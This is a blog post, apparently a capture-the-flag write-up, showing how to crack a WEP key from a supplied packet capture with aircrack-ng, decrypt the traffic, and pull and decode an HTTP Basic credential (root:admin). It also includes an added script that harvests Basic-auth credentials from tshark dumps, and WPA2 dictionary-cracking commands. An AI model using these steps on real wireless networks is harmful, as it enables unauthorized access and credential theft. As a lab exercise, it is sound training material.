Saturday, August 10, 2013

Using aircrack-ng, airdecap-ng, tshark, and grep regex

Recently, in a capture-the-flag event, I had to use aircrack-ng to break the WEP key from a packet capture, then airdecap-ng to decrypt the WEP frames and write them out to a new capture, tshark to dump that capture to text, and finally a grep regular expression to extract the base64-encoded HTTP Basic authentication username and password.

Below are the commands I ran to accomplish this:

# aircrack-ng WIRELESS-C2.cap 
Opening WIRELESS-C2.cap
Read 73650 packets.

   #  BSSID              ESSID                     Encryption

   1  00:40:10:20:00:03  Wireless Challenge Two    WEP (25704 IVs)

Choosing first network as target.

Opening WIRELESS-C2.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 25704 ivs.

                                            Aircrack-ng 1.2 beta1

                            [00:00:00] Tested 397 keys (got 25082 IVs)

   KB    depth   byte(vote)
    0    2/  4   DA(31232) C0(30976) 22(30720) E8(30720) 16(30208) 25(30208) D0(30208) 
    1    0/  1   1C(35840) 03(32256) 7F(32000) B7(32000) F2(30464) 95(30208) 86(29952) 
    2    0/  5   91(34048) CC(33792) 2D(32512) 58(31232) 84(31232) 2F(30720) 3D(30720) 
    3    5/ 26   0A(30208) 39(30208) 5B(30208) 62(29952) ED(29696) 02(29696) 2E(29696) 
    4    0/  1   C4(35072) 19(31744) 31(30464) CD(30208) 10(29696) 6E(29696) D5(29696) 

                         KEY FOUND! [ C0:1C:91:0A:C4 ] 
        Decrypted correctly: 100%

# airdecap-ng -w c01c910ac4 WIRELESS-C2.cap
## -w takes the WEP key in hex; the decrypted frames are written to WIRELESS-C2-dec.cap

## Open WIRELESS-C2-dec.cap in Wireshark
## Apply the filter (http.request.method == "GET") || (http.request.method == "POST")
## In the filtered list, find the request for the management.asp page
## Right-click it and choose Follow TCP Stream
## In the stream window you will find the header "Authorization: Basic cm9vdDphZG1pbg=="
## The base64 string is the Basic-auth credential, encoded as username:password
## Decoded, the username and password are root:admin

## OR you can use tshark to dump the packet details to a text file

# tshark -V -r WIRELESS-C2-dec.cap > WIRELESS-C2-dec.txt

## Then a short and sweet regex to pull out base64-looking strings

# grep -E '[A-Za-z0-9+/]{11,}=' WIRELESS-C2-dec.txt   # runs of 11+ base64 characters followed by "=" padding; unpadded base64 will not match, so also grep for 'Authorization: Basic' if this comes up empty

## Voilà!  Authorization: Basic cm9vdDphZG1pbg==\r\n
## Then decode it from the command line:

# echo "cm9vdDphZG1pbg==" | base64 -d
## root:admin
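The grep-and-decode step above, automated as a small shell script that finds every Basic-auth header in a tshark -V dump and decodes it. This is an added example and not part of the original post; the tshark-style lines it parses are constructed here and the hosts and credentials in them are made up.

```bash
#!/bin/sh
# Added example, not from the original post: pull every HTTP Basic
# credential out of a `tshark -V` text dump and decode it, rather than
# eyeballing grep output. tshark prints each header with a literal "\r\n"
# at the end (see the post's grep hit), so the token regex stops at "\".

# Constructed sample of tshark -V output. The hosts and credentials are
# made up for this example; they are not from the WIRELESS-C2 capture.
SAMPLE_DUMP='Hypertext Transfer Protocol
    GET /management.asp HTTP/1.1\r\n
    Host: 192.0.2.1\r\n
    Authorization: Basic cm9vdDphZG1pbg==\r\n
    User-Agent: Mozilla/5.0\r\n
Hypertext Transfer Protocol
    POST /login.cgi HTTP/1.1\r\n
    Host: 192.0.2.1\r\n
    Authorization: Basic YWRtaW46cGFzc3dvcmQxMjM=\r\n
Hypertext Transfer Protocol
    GET /index.html HTTP/1.1\r\n
    Authorization: Basic cm9vdDphZG1pbg==\r\n
    Authorization: Bearer not-a-basic-token\r\n'

# Print the base64 token of every "Authorization: Basic" header on stdin,
# one per line. Only the base64 alphabet plus padding is accepted, so the
# trailing "\r\n" that tshark prints is never swallowed into the token.
extract_basic_tokens() {
    grep -oE 'Authorization: Basic [A-Za-z0-9+/]+={0,2}' | awk '{ print $3 }'
}

# Decode one token to "user:password" on stdout. The exit status is that of
# base64 -d, so garbage that merely looks like base64 is reported rather
# than silently printed as binary junk.
decode_basic() {
    printf '%s' "$1" | base64 -d 2>/dev/null
}

# Read a tshark -V dump on stdin and print "token -> user:password" for each
# distinct Basic token found. Duplicates (the same credential replayed on
# every request) are collapsed so the list is one line per credential.
extract_basic_creds() {
    extract_basic_tokens | sort -u | while IFS= read -r tok; do
        if creds=$(decode_basic "$tok"); then
            printf '%s -> %s\n' "$tok" "$creds"
        else
            printf '%s -> (not valid base64)\n' "$tok"
        fi
    done
}

# Usage: pipe the dump in. With the real file from the post:
#   extract_basic_creds < WIRELESS-C2-dec.txt
printf '%s\n' "$SAMPLE_DUMP" | extract_basic_creds
```

Matching on the header name instead of on "anything that looks like base64" avoids the false hits a bare alphanumeric regex gives on a full tshark dump. If you have a recent tshark, you can also skip the text dump and ask for the header field directly with `tshark -r WIRELESS-C2-dec.cap -Y http.authorization -T fields -e http.authorization`, then feed that output to the same decode loop.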

# Note on WPA2 packet captures
## aircrack-ng only does a dictionary attack against WPA/WPA2, and both cracking and decryption need the client's 4-way handshake (EAPOL frames) to be in the capture
# aircrack-ng <file>.cap -w Wordlist.txt   # recover the passphrase

# Then to decrypt the packet capture
# airdecap-ng -e <SSID> -p <password> <file>.pcap
